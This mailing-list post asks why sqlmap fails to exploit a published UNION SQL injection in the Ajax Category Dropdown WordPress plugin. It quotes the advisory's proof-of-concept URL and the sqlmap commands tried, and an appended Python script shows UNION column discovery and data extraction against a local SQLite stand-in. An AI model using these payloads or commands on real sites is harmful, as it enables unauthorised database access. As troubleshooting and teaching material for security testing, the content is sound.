Hi,
I just read the Multiple SQL Injection in Ajax Category Dropdown WordPress
plugin advisory <http://www.htbridge.ch/advisory/multiple_sql_injection_in_ajax_category_dropdown_wordpress_plugin.html>
published by High-Tech Bridge. Among others there's a generic
UNION inject on the *category_id* GET parameter, and I decided to try it
with sqlmap.
Here's the PoC provided in the advisory:
http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201
As you can see there's a 10-column UNION, of which columns 2 and 10 are
rendered on the page; so when you try the above proof-of-concept on a
vulnerable target it should render a single-item dropdown box in the format:
db_user (db_version)
However, I couldn't seem to be able to exploit it via sqlmap.
So, as it was a Linux box and considering WordPress runs on MySQL, I
used the following as a base for the test:
./sqlmap.py --os linux --dbms mysql --technique U --union-cols 9-11 -p category_id --referer "http://[host]/" -u "http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1"
And then I tried everything from _--level 1_ to _5_, from _--risk 1_ to _3_,
with and without _--string "Uncategorized"_ (which applies for GET
_category_id=1_), and even _--prefix " union select " --suffix " -- 1"_; all
with no luck. In the end I removed all of the previous flags until I was
finally able to exploit an _OR boolean-based blind - WHERE or HAVING clause_
and a _MySQL > 5.0.11 OR time-based blind_ inject, but only when using
_--risk 3 --level 2_; there was also a _MySQL < 5.0.12 AND time-based blind
(heavy query)_ on _--risk 2 --level 2_, but it was too much for the server.
But still, there was no way to exploit the actual UNION flaw via sqlmap.
Any clue?
--
Emiliano
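The manual procedure the post describes (find the column count of the UNION, find which columns are rendered, then put user()/version() into those slots) is what sqlmap's --technique U automates. The following is an added example, not code from the post, the advisory or sqlmap: it reproduces that procedure against a constructed stand-in for the vulnerable script. The stand-in is an in-memory SQLite table with 10 columns (an assumption matching the 10-column UNION in the PoC) and a fake page function that concatenates category_id into the query and renders column 2 and column 10 of each row as "col2 (col10)", mirroring the "db_user (db_version)" output. Because it is SQLite, the extraction step uses sqlite_version() where the real target would take MySQL's user() and version().

```python
"""Manual UNION-column discovery and extraction (added example).

Everything below is constructed for demonstration: the table, the rows,
the fake page renderer and the marker names. It is not the plugin's code.
"""
import re
import sqlite3

NCOLS_REAL = 10  # assumption: the vulnerable SELECT returns 10 columns

_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE cats (c1, c2, c3, c4, c5, c6, c7, c8, c9, c10)")
_db.execute("INSERT INTO cats VALUES (1,'Uncategorized',3,4,5,6,7,8,9,'x')")


def vulnerable_page(category_id: str) -> str:
    """Constructed stand-in for the vulnerable request script: the GET
    parameter is concatenated into the query unsanitised, a SQL error is
    swallowed (empty dropdown), and columns 2 and 10 of every row are
    rendered as '<option>col2 (col10)</option>'."""
    sql = ("SELECT c1,c2,c3,c4,c5,c6,c7,c8,c9,c10 FROM cats WHERE c1 = "
           + category_id)
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return "<select></select>"
    opts = "".join(f"<option>{r[1]} ({r[9]})</option>" for r in rows)
    return f"<select>{opts}</select>"


def union_payload(ncols: int, tag: str = "qx") -> str:
    """'1 union select <tag>1,<tag>2,... -- 1' with a unique string marker
    per column. The advisory PoC uses the integers 1..10 for the same job;
    distinct markers make it unambiguous which column lands where."""
    cols = ",".join(f"'{tag}{i}'" for i in range(1, ncols + 1))
    return f"1 union select {cols} -- 1"


def find_union_columns(fetch, max_cols: int = 20, tag: str = "qx"):
    """Probe column counts 1..max_cols; the first count whose markers show
    up in the page is the real one. Returns (ncols, rendered_positions)
    or (None, []) if nothing is ever reflected."""
    for n in range(1, max_cols + 1):
        page = fetch(union_payload(n, tag))
        shown = sorted({int(m) for m in re.findall(rf"{tag}(\d+)", page)})
        if shown:
            return n, shown
    return None, []


def union_extract(fetch, ncols: int, slots: dict) -> str:
    """Place SQL expressions into the rendered column positions (1-based,
    e.g. {2: "user()", 10: "version()"} on MySQL) and return the page.
    Remaining columns get an integer filler, as in the PoC."""
    cols = ",".join(slots.get(i, str(i)) for i in range(1, ncols + 1))
    return fetch(f"1 union select {cols} -- 1")


if __name__ == "__main__":
    n, shown = find_union_columns(vulnerable_page)
    print("columns:", n, "rendered at:", shown)            # 10, [2, 10]
    # On the real (MySQL) target the slots would be user() and version().
    print(union_extract(vulnerable_page, n,
                        {2: "'stand-in user'", 10: "sqlite_version()"}))
```

The probe loop is the same idea as sqlmap's column-count brute force, except that sqlmap fills the unknown columns with NULL by default (the --union-char option changes that filler), while this script and the advisory PoC fill them with values that are guaranteed to be rendered if the column is on the page.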